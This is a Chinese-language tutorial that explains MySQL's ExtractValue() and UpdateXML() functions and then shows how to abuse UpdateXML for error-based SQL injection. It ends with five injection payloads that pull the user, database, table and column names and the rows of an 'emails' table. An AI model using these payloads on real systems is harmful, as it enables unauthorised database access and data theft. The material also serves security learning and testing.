特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他
基础知识准备:
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()
下面是这两个函数的使用示例:
CREATE TABLE x (doc VARCHAR(150));
INSERT INTO x VALUES
('
<book>
<title>A guide to the SQL standard</title>
<author>
<initial>CJ</initial>
<surname>Date</surname>
</author>
</book>
');
INSERT INTO x VALUES
('
<book>
<title>SQL:1999</title>
<author>
<initial>J</initial>
<surname>Melton</surname>
</author>
</book>
');
大家可以看到,doc列的内容中包含了自己的层次结构,以XML格式体现包含书名和作者的书本,其中作者还包含名字简写大写以及姓。这是流行的排版和储存格式,字母"<book>" 和</book>"是标记,使用户更容易理解内部的层次结构。
语法:
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
作用:从目标XML中返回包含所查询值的字符串
SELECT EXTRACTVALUE(doc,'/book/author/initial') FROM x;
可以看到,EXTRACTVALUE()函数将/book/author/initial节点中的值取出来,并通过Select返回。因此需要简单的查找XML文档中的值,只要在XPath_string参数中指定好层次和节点就行了。
UpdateXML()函数
语法
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
mysql> select UpdateXML(doc,'/book/author/initial','!!') from x;
UpdateXML函数的前两个参数用法以及写法与ExtractValue是一样的,因为这里需要查找到符合条件的数据节点。第三个参数就是为了替换节点字符串的。文中我们就使用!!字符串替换了book/author/initial节点的值。返回值是整个改变后的XML文档。这里记住,由于我们使用的是Select语句,因此并没有对真正的数据进行修改,而是在内存中将取出的数据进行修改然后返回给用户。如果需要彻底的修改文档内容,可以使用下面语句:
UPDATE x SET doc = UpdateXML(doc,/book/author/initial','!!');
细心的人也许发现这里有一个错误,也许是Bug,因为我们并不想修改结构化的文档,而仅仅需要修改内容,但UpdateXML函数将<initial>CJ></initial>整个文本改成了!!,这样就不是我们所想要的了,因为它改变了整个文档结构。因此如果你需要的仅仅是修改这个结构化文档的内容部分,而不是整个文本,可以使用:
UpdateXML(doc,'/book/author/initial','<initial>!!</initial>') from x;
示例#U2
mysql> select
extractvalue(
UpdateXML(doc,'/book/author/initial','<initial>!!</initial>'),'/book/author/
initial') from x;
最后一个例子,ExtractValue()函数和UpdateXML()函数的嵌套使用,结果是给我们展示将initial节点的值改成!!后选择查询initial节点的内容
1.利用updatexml获取user()
id=2' and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+
2.利用updatexml获取database()
2' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
3.利用updatexml获取数据库表名
id=2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+
4.利用updatexml获取数据库列表
=2' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name= 'emails' ),0x7e),1) --+
5、利用updatexml获取数据库
2' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(':',id,email_id)) from `emails` ),0x7e),1) --+
